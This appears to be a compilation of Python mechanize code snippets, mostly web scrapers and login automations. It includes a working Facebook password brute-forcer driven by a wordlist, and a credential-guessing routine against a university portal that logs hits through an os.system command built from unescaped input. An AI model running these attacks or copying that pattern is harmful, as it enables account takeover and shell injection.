        links.append(re.search(r"'(.*)'", link.url).group(1))

    # So we download the oldest ones first.
    links.reverse()

    print 'Found %d links, getting video streams.' % len(links)

    videos = []
    for link in links:
        response = br.open(link)
        soup = BeautifulSoup(response.read())
        video = soup.find('object', id='WMPlayer')['data']
        video = re.sub('http', 'mms', video)
        video = video.replace(' ', '%20')  # remove spaces, they break urls

        output_name = re.search(r'[a-z]+[0-9]+[a-z]?/[0-9]+',
                                video).group(0).replace('/', '_')
        output_wmv = output_name + '.wmv'

        print video
        videos.append((video, output_wmv))

    print 'Downloading %d video streams.' % (len(videos))
    for video in videos:
        download(video)

    print 'Done!'
Exemple #41
0
def DownloadPage(url, headers=None):
    if headers == None:
        headers = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
    else:
        pass
        
    from mechanize import Browser, _http
    
    br = Browser()    
    br.set_handle_robots(False)
    br.addheaders = headers
    
    page = br.open(url)
    return page.read()
Exemple #42
0
def login():
    br = Browser()

    br.set_handle_robots(False)
    br.addheaders = [('User-agent', 'Chrome')]
    br.open("https://auth.tdameritrade.com")

    br.select_form(id="authform")
    br.form['su_username'] = "******"
    br.form['su_password'] = "******"

    no_url = br.submit()
    url = no_url.geturl()
    return url
Exemple #43
0
def clarisha():
	try:
		
		br = Browser() # Super Hidden Browser
		c = cookielib.LWPCookieJar() # Variable For CookiesJar 
		# Other Options Must Be Set 
		br.set_handle_robots(False)
		br.set_handle_equiv(True)
		br.set_handle_referer(True)
		br.set_handle_redirect(True)
		br.set_cookiejar(c) # Seting Up Cookies
		br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) # Refresh
		headers = [("User-agent",'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1' )] 
		br.addheaders = headers	# Seting Up User-Agent
		user_name = raw_input( 'Enter UserName / Email >> ')
		wordlist = raw_input('Enter Passwords List >> ')
		try:
			open(wordlist,'r')
		except IOError:
			octa()
			print(NGENTOT+'No Such File or Directory >> %s'%(wordlist)+ENDC)
			print('\n')
			clarisha()
		octa()
		wordlist = open(wordlist, 'r') # Opening Passwords List in Read Mode 
		for password in wordlist: # Taking Each Password on the List
			password = password.rstrip('\n')
			br.open('https://www.facebook.com/login.php') # Open Login Facebook URL
			# Seting Some Option ('HTML Options') 
			br.select_form(nr=0)
			br.form['email'] = user_name
			br.form['pass'] = password
			br.submit()
			url = br.geturl()
			if url == 'https://www.facebook.com/login.php' or url == 'https://www.facebook.com/login.php?login_attempt=1&lwv=100':
				print(NGENTOT + 'Password Not Correct %s'%(password))
			elif url == 'https://www.facebook.com/' or url == 'https://www.facebook.com/?sk=welcome' or url == 'https://www.facebook.com/checkpoint/?next':
				print('\n')
				print('+------------------------------------------|')
				print(' | Password Found : %s'%(MUKIDI+password+ENDC) +  '|')
				print('+------------------------------------------|')
				print('\n')
				exit(0)

	except KeyboardInterrupt:
		time.sleep(1)
		octa()
		print(NGENTOT+'Exiting =)')
		print('\n')
		sys.exit(0)
def download():
  b=Browser()
  b.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]

  r1=b.open(URL)

  b.select_form(nr=0)
  b.set_all_readonly(False)
  b["__EVENTTARGET"] = "ctl00$CPH1$dgMain"
  b["__EVENTARGUMENT"] = "Page$2"
  b.find_control("ctl00$CPH1$tbSearch").disabled=True

  r2=b.submit()

  return [r1,r2]
Exemple #45
0
def Top10Followers():
    ua = 'Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 (compatible;)'
    br = Browser()
    br.set_handle_robots(False)
    br.addheaders = [('User-Agent', ua), ('Accept', '*/*')]
    br.open('http://socialblade.com/instagram/top/10/followers')
    soup = BeautifulSoup(br.response().read())
    table = soup.find('div', {'class':'content-module-wide'}).contents
    top10 = []
    for i in xrange(1, 120, 2):
        top10.append(table[i].text.replace(',', '.'))
    top10return = []
    for n in range(0, 10):
        top10return.append('%s | %s | %s | %s | %s\n' % ([top10[x:x+6] for x in xrange(0, len(top10), 6)][n][0], [top10[x:x+6] for x in xrange(0, len(top10), 6)][n][2], [top10[x:x+6] for x in xrange(0, len(top10), 6)][n][3], [top10[x:x+6] for x in xrange(0, len(top10), 6)][n][4], [top10[x:x+6] for x in xrange(0, len(top10), 6)][n][5]))
    return ''.join(top10return)
Exemple #46
0
def init_browser():
    browser = Browser()
    browser.addheaders = (
        ('Accept',
         'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'),
        ('User-agent', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
         )  # We're Firefox! :P
    )
    # browser.set_handle_gzip(True) # Currently experimental in mechanize
    browser.set_handle_redirect(True)
    browser.set_handle_refresh(False)
    browser.set_handle_robots(True)
    browser.set_handled_schemes(['http', 'https'])
    browser.set_proxies({})
    return browser
Exemple #47
0
    def redirect(self):
        try:
            if self.agent == True:
                br = Browser()
                UserAgent = "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0"
                header = {"User-Agent": UserAgent}
                br.set_handle_robots(False)
                br.addheaders = [("User-agent", "Fifefox")]

                remote_url = br.open(self.target).geturl()
            else:
                remote_url = u.urlopen(self.target).geturl()
            return (remote_url)
        except Exception as e:
            print(e)
Exemple #48
0
    def get_browser(browser=None):
        """ Create new browser if none is present.

        Returns:
            (:class:`mechanize.Browser`)
        """
        if not browser:
            browser = Browser()
            browser.set_handle_robots(False)
            browser.addheaders = [('User-agent',
                                   ('Mozilla/5.0 (X11; U; Linux i686; en-US; '
                                    'rv:1.9.0.1) Gecko/2008071615 '
                                    'Fedora/3.0.1-1.fc9 Firefox/3.0.1'))]

        return browser
Exemple #49
0
    def HTTPcode(self):
        try:
            if self.agent == True:
                br = Browser()
                UserAgent = "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0"
                header = {"User-Agent": UserAgent}
                br.set_handle_robots(False)
                br.addheaders = [("User-agent", "Fifefox")]

                resp = br.open(self.target).code
            else:
                resp = u.urlopen(self.target).getcode()
            return (resp)
        except (u.HTTPError, u.URLError):
            return (404)
Exemple #50
0
def getdata(url):

    br = Browser()

    # Ignore robots.txt
    br.set_handle_robots(False)
    # Google demands a user-agent that isn't a robot
    br.addheaders = [('User-agent', 'Firefox')]

    # Retrieve the Google home page, saving the response
    br.open(url)

    res = br.response()
    data = res.get_data()

    return data
Exemple #51
0
def download(url):
    br = Browser()
    br.set_handle_robots(False)
    br.addheaders = [(
        'User-agent',
        'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1'
    )]
    br.open("https://translate.google.com/translate?hl=&sl=&tl=&u=" + url +
            "&anno=2")
    for link in br.links():
        if "https://translate.googleusercontent.com/translate_p?" in link.absolute_url:
            br.follow_link(link)
            break
    response = BeautifulSoup(br.response().read().decode(),
                             "html.parser").find("pre").get_text()
    return response
Exemple #52
0
def setupUSCIS(immInfo):
    br = Browser()
    br.addheaders = [('User-Agent', "Mozilla/5.0 \
    (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko)\
     Chrome/79.0.3945.130 Safari/537.36")]

    # opens to the sign up page
    br.open('https://egov.uscis.gov/casestatus/disclaimer.do')
    br.follow_link(text="ACCEPT")

    # clicks next (nothing on page 1)
    br.select_form("signUpForm")
    br.submit()

    #fills in the signup sheet
    br.select_form("signUpForm")
    br.form["userSubType"] = ["1"]
    br.form["firstName"] = immInfo["firstName"]
    br.form["lastName"] = immInfo["lastName"]
    br.form["country"] = immInfo["country"]
    br.form["city"] = immInfo["city"]
    br.form["state"] = immInfo["state"]
    br.form["zipCode"] = immInfo["zipCode"]
    br.form["email"] = immInfo["email"]
    br.form["phone"] = immInfo["phone"]
    br.form["language"] = immInfo["language"]
    br.submit()

    #generates random username and password
    br.select_form("signUpForm")
    br.form["userId"] = immInfo["username"]
    br.form["password"] = immInfo["password"]
    br.form["confirmPassword"] = immInfo["password"]

    #counts each question answered
    counter = 1
    for i in range(1, 13):
        if counter == 5:
            break
        #checks if the answer exists
        if immInfo["answer" + str(i)]:
            br.form["question" + str(counter)] = str(i)
            br.form["answer" + str(counter)] = immInfo["answer" + str(i)]
            counter += 1

    #submits form
    br.submit()
def verify(th, num, curso, matr, senha):
    URL = "https://siteseguro.inatel.br/PortalAcademico/WebLogin.aspx"

    br = Browser()
    br.set_handle_robots(False)
    br.open(URL)

    br.select_form('aspnetForm')
    br.addheaders = [('User-agent',
                      'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) '
                      'Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]

    br.form['ctl00$Corpo$TabAcessoLogin$TabAluno$LogOn$tbMatricula'] = matr
    br.form['ctl00$Corpo$TabAcessoLogin$TabAluno$LogOn$Password'] = senha
    br.form['ctl00$Corpo$TabAcessoLogin$TabAluno$LogOn$dropSubCurso'] = [curso]

    response = br.submit(name='ctl00$Corpo$TabAcessoLogin'
                              '$TabAluno$LogOn$LoginButton')

    dados = response.read()

    soup = BeautifulSoup(dados, 'html.parser')

    try:
        label_erro = soup.find(id='ctl00_Corpo_lblErro')
        label_login = soup.find(id='ctl00_LoginName1')

        if label_erro is not None:
            label_erro_str = label_erro.get_text().encode('ascii', 'ignore')

        if label_login is not None:
            os.system("echo 'Curso: %s; Matr: %s; Senha: %s' "
                      ">> senha.log" % (curso, matr, senha))
            return True

        elif label_erro_str == ('Sua senha est bloqueada. Entre '
                                'em contato com a CRA para providenciar '
                                'o desbloqueio ou aguarde 30 minutos.'):
            os.system("echo 'Curso: %s; Matr: %s; Senha: %s' "
                      ">> bloqueado.log" % (curso, matr, senha))
            return False

        else:
            print('Thread: %i ==> Curso: %s; Matr: %s; Senha: %s; NOK' % (num, curso, matr, senha))

    except:
        print("Erro na biblioteca, verifique as dependencias!")
Exemple #54
0
 def process_irc(self, ident, _from, to, msg):
     """
     Handle IRC messages
     """
     # Process URLs posting
     for url in self.xurls(msg):
         if re.match("^(http|https)://(www\.|)youtube.com.*", url):
             self.process_irc_youtube(url)
             continue
         try:
             br = Browser()
             br.set_handle_robots(False)
             br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0')]
             br.open(url)
             self.irc.privmsg(self.channel, "Title: " + br.title())
         except Exception, e:
             self.debug.error("process_irc: Exception '%s'." % e)
Exemple #55
0
def send_sms_voda(user, pword, number, txt):
    if user[0] == '0':
        user = '******' + user[1:]

    br = Browser()

    # Set user-agent
    headers = dict(br.addheaders)
    headers[
        "User-agent"] = "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008052912 Firefox/3.0"
    br.addheaders = headers.items()

    # Login
    br.open(LOGIN_URL)
    br.select_form(nr=1)
    br["logon"] = user
    br["password"] = pword
    print "Logging in..."
    br.submit()

    # Send SMS
    br.open(SMS_URL)
    br.select_form(nr=1)
    br["destinationNumber"] = number
    br["messageBody"] = txt

    # Thanks for using shitty code Vodacom. We have to extract the submission
    # url from the javascript code in the document.
    page = br.response().read()
    x = page.find('function validateFormInput()')
    x = page.find('var actionURL', x)
    actionURLStart = page.find("'", x) + 1
    actionURLEnd = page.find("'", actionURLStart)
    actionURL = page[actionURLStart:actionURLEnd]
    br.form.action = 'https://www.vodacom.co.za' + actionURL

    print "Sending message..."
    br.submit()

    response = br.response().read()
    if 'Your SMS has been delivered successfully.' in response:
        print "Message sent"
    else:
        print >> stderr, "Message sending failed. See /tmp/vodacom.html to see the response."
        file('/tmp/vodacom.html', 'w').write(response)
        exit(1)
Exemple #56
0
def doLogin():
    global br 
    br = Browser()
    br.set_handle_robots(False)
    br.set_handle_refresh(False)
    br.addheaders = [('User-agent', 'Firefox')]
    br.open("https://www.qruiser.com")
    #response1 = br.follow_link(link)
    i = 0
    for form in br.forms():
        i += 1
        #print form
        if i > 1:
            br.form = form
    br.form['loginname'] = 'maxberggren'
    br.form['loginpassword'] = '******'
    response = br.submit()  
Exemple #57
0
def get_horario(matr, senha, curso):

    URL = "https://siteseguro.inatel.br/PortalAcademico/Academico/Sra/WebQuadroAulas.aspx"

    br = Browser()
    br.set_handle_robots(False)
    br.open(URL)

    br.set_handle_robots(False)

    br.select_form('aspnetForm')
    br.addheaders = [(
        'User-agent',
        'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1'
    )]

    br.form['ctl00$Corpo$TabAcessoLogin$TabAluno$LogOn$tbMatricula'] = matr
    br.form['ctl00$Corpo$TabAcessoLogin$TabAluno$LogOn$Password'] = senha
    br.form['ctl00$Corpo$TabAcessoLogin$TabAluno$LogOn$dropSubCurso'] = [curso]

    response = br.submit(
        name='ctl00$Corpo$TabAcessoLogin$TabAluno$LogOn$LoginButton')

    dados = response.read()

    soup = BeautifulSoup(dados, 'html.parser')

    soup2 = soup.find(id='ctl00_Corpo_UCQuadroHorarios1_GridDados')
    all_td = soup2.find_all("td")
    aux = []

    for var in all_td:
        aux.append(var.get_text())

    lista_horario = []

    for x in range(0, 15):
        lista_horario.append(aux[2 + (19 * x)])
        lista_horario.append(aux[5 + (19 * x)])
        lista_horario.append(aux[8 + (19 * x)])
        lista_horario.append(aux[11 + (19 * x)])
        lista_horario.append(aux[14 + (19 * x)])
        lista_horario.append(aux[17 + (19 * x)])

    return lista_horario
def submit_form(response):
    browser = Browser()
    browser.set_handle_robots(False)
    browser.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]

    browser.open(response.url)
    browser.select_form(nr = 0)
    browser.form['username'] = USERNAME
    browser.form['password'] = PASSWORD
    browser.submit() 

    url_principal = browser.geturl()
    browser.open(url_principal)
    browser.select_form(nr = 0)
    print browser.response().read()
    browser.submit() 

    return browser 
def crawler():
    global url
    global total_new
    agent = Browser()
    agent.addheaders = [('User-agent', 'Firefox')]
    agent.set_handle_robots(True)
    agent.set_handle_refresh(False)

    agent_data = agent.open(url)
    soup = BS(agent_data.read(), "lxml")

    for row in soup.find_all(
            'div', attrs={"class": "list-view--item vertical-list-item"}):
        link = row.find('a')['href']
        date = row.find('span', attrs={"class": "timestamp"}).text
        text = row.find('p', attrs={"class": "heading text-underline"}).text
        if {"date": date, "news": text, "link": link} not in total_news:
            total_news.append({"date": date, "news": text, "link": link})
def SHOW(url):
    from mechanize import Browser
    br = Browser()
    br.set_handle_robots(False)
    br.addheaders = [('User-agent', 'Firefox')]
    br.open(url)
    response = br.open(url)
    data = response.read()
    response.close()
    cr = 0
    match = re.compile(
        '<span class="bold">(.+?)</span>.*\n.*src="(.+?)"').findall(data)
    #matchi = re.compile('<link rel="image_src" href="(.+?)"').findall(data)
    for server, link in match:
        #for thumbnail in match:
        title = 'Сървър-' + server + name
        addLink2(name, link, 10, iconimage, title)
        cr = cr + 1